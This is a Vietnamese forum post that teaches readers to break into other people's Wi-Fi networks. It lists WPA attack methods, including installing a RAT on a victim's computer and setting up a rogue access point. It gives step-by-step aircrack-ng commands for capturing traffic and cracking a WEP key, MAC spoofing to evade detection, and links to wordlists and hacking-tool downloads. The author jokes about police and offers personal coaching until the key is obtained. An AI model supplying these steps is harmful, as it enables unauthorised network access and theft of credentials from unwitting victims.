UPDATED
Xin thưa các anh em , hiện tại có 4 cách hack WPA+WPA2 mà dân hacker dang dùng
List of methods:
1. Dictionary attack (sử dụng Dictionary dể tra pass hay còn gọi là sổ số kiến thiết ,hên xui )
2. Bruteforce attack (cách này thì perfect ,pass cỡ nào tra cũng ra => thời gian tìm ra pass thì lâu vô cùng ,tùy vào dộ dài hay dộ khó của pass)
3. RAT+Wirelesskeyview combo attack (cách này thì tựa như là cài Keylogger vào máy victim ,mà con RAT này lợi hại hơn KeyLog ở chỗ là mình có thể điều khiển máy victim => lấy cắp pass rất dễ) . Cách này mà bị police bắt thì truy ra 2 tội (a.dột nhập máy trái phép / b.ăn cắp WIFI trái phép )
4. Rogue AP attack (cách này nghe tụi hacker bảo là khả thi nhất và dễ lấy pass nhất .Nhưng cách này dòi hỏi phải có kiến thức nhiều về mạng ,vì cách thức hoạt dộng là tạo một AP giả mạo ,sau đó Victim kết nối vào và nó require password again ,sau khi victim type vào thì pass sẽ chuyển về cho mình.)
TIN VUI CHO CÁC ANH EM ^^!
Hai nhà khoa học máy tính đến từ trường đại học Toshihiro Ohigashi và Masakatu Morii (Nhật Bản) cho biết, họ có thể bẻ khóa hệ thống mã hóa bảo vệ để truy cập trái phép vào mạng Wi-fi (WPA) trong các bộ định tuyến không dây, và qua trình này chỉ mất có 1 phút.
Thông qua cách làm này, kẻ tấn công có thể đọc lưu lượng được mã hóa gửi đi giữa các máy tính và các bộ định tuyến (router) sử dụng hệ thống mã hóa WPA (truy cập Wi-Fi được bảo vệ). Hai nhà khoa học dự kiến sẽ thảo luận chi tiết hơn về cách thức bẻ khóa này tại hội thảo công nghệ diễn ra vào ngày 25/9 tới tại Hiroshima.
Tháng 11 năm ngoái, các nhà nghiên cứu bảo mật đã trình diễn cách thức bẻ khóa WPA và phải mất từ 12-15 phút. Khi đó, kỹ thuật bẻ khóa được thực hiện trên các hệ thống WPA sử dụng thuật toán Temporal Key Integrity Protocol (TKIP) và không thể áp dụng đối với các thiết bị WPA 2 mới hơn hoặc sử dụng thuật toán mã hóa Advanced Encryption Standard (AES) cấp cao hơn. Còn lần này, các nhà nghiên cứu Nhật Bản đưa ra cách bẻ khóa ở mức mới cao hơn, phạm vi rộng hơn và chỉ mất có 60 giây.
Các bộ định tuyến sử dụng hệ thống bảo mật đã gặp nhiều vấn đề bảo mật trong thời gian qua như hệ thống Wired Equivalent Privacy (WEP) được giới thiệu năm 1997 và bị bẻ khóa chỉ vài năm sau đó. Do đó, lần bẻ khóa này của các chuyên gia bảo mật Nhật Bản đã một lần nữa đánh lên hồi chuông cảnh báo độ bảo mật trên các bộ định tuyến Wi-Fi.
Theo VnMedia (PC World)
"BACKTRACK" CÔNG CỤ HACK WIFI HÀNG ĐẦU THẾ GIỚI
DÙNG CHO MỌI HỆ ĐIỀU HÀNH
bước 1 downnload BACKTRACK 4 beta
KHI DOWN FILE ISO VỀ BURN RA ĐĨA VÀ BOOT --> MÌNH DÙNG LIVE CD
- Code:
-
http://www.backtrack-linux.org/downloads/
bước 2 download tài liệu về --> dành cho những bạn thích hiểu rõ về cấu trúc của nó
mediafire :
- Code:
-
http://www.mediafire.com/?sharekey=9feb27a6653605bab94117dade8fc295e04e75f6e8ebb871
CÁI NÀY MÌNH LIỆT KÊ RA CHO NHỮNG BẠN LƯỜI ĐỌC MÀ CHỈ THÍCK HACK LIỀN
LƯU Ý KHI DÙNG BACKTRACT THEO TÀI LIỆU
1.BT 4 beta
2.để tự động boot không chỉnh bất cứ dòng nào
3.login:root
4.pass:toor
5.mở bảng conshole:có 1 ô màu đen bé xíu kế bên startmenu
CÁC BẠN LÀM THEO DÒNG LỆNH SAU
1.iwconfig-->xem tên card mình đang dùng
mình dùng card interface là wlan0 nên---> nên xem tài liêu ở trên để hiễu rõ hơn
2.airmon-ng
3.airmon-ng stop wlan0
4.airmon-ng start wlan0
5.airodump-ng --ivs --write capturefile wlan0
6.airodump-ng --ivs --channel {ap channel** --bssid {ap bssid** --write capturefile wlan0
7.aireplay-ng --arpreplay -b {ap bssid** -h {client MAC from airodump** wlan0
8.aircrack-ng -b {ap bssid**
thế là đã có wep key -->mình khuyên các bạn nên đọc tài liệu trên để hiể hơn (100% thành công)
lượng DATA tối thiểu nên chờ là 40 000 nha các bạn
CHANGE mac NẾU CẦN THIẾT
change mac) thực hiện theo các lệnh sau
-(...) tên interface như WLAN0 chẳng hạn
airmon-ng
airmon-ng stop ...
iconfig ... down
macchanger --mac 00:11:22:33:44:55 ...
airmon-ng start ...
và khi đã monitor , thì bạn tiếp tục thưc hiện các lệnh kế , và bây giờ bạn ko cần quan tâm station cũa người ta (khi đến lệnh nào mầ phải điền station thì bạn điền 00:11 ..etc
have fun
bác nào khi chạy iwconfig ko có thông tin card wifi của mình thì nên vào:
những hardware chạy dc trên BT4những hardware hông hỗ trợ trên BT4vô đó search theo loại card mà mình sử dụng, ko cần phải đăng kí để search
+nếu ai ko hiểu bước nào cứ nhắn vào ,mình sẽ chỉ đến khi lấy được key thôi , (và mình sẽ ko chịu trách nhiệm khi các bạn được police mời đi uống trà đá )
1 VÀI DICTIONARY CHO NHỮNG AI HACK WPA & WPA2
- Code:
-
http://websecurity.ro/downloads/dictionary.tar.gz
18M :
- Code:
-
http://upload.gibbocool.com/files/28GBwordlist.rar
74M :
- Code:
-
http://rapidshare.com/files/98295454/huge_wordlist.rar
78MB
lưu ý : các dictionary ở trên khi extract ra sẽ có dung lượng vài chục GB ,nên hãy xem xét trườc khi down
còn đây là trang web chứa dictonary ,ai thĩ thì vào tìm hiểu,có luôn các tool để làm wordlist. Nhưng tạo wordlist thường thường tử 3-8 ký tự alphanumeric không cũng đã vài GB rồi.
- Code:
-
http://packetstormsecurity.org/Crackers/wordlists/utilities
NGOÀI RA CÒN CÓ THÊM HÀNG CHUC PHẦN MỀM HACK KHÁC
THAM KHẢO TẠI :
- Code:
-
http://win7dl.com/dl-download-hack-de-crossfire-pegando-no-xtrap-depois-da-utima-atualizacao-8122009/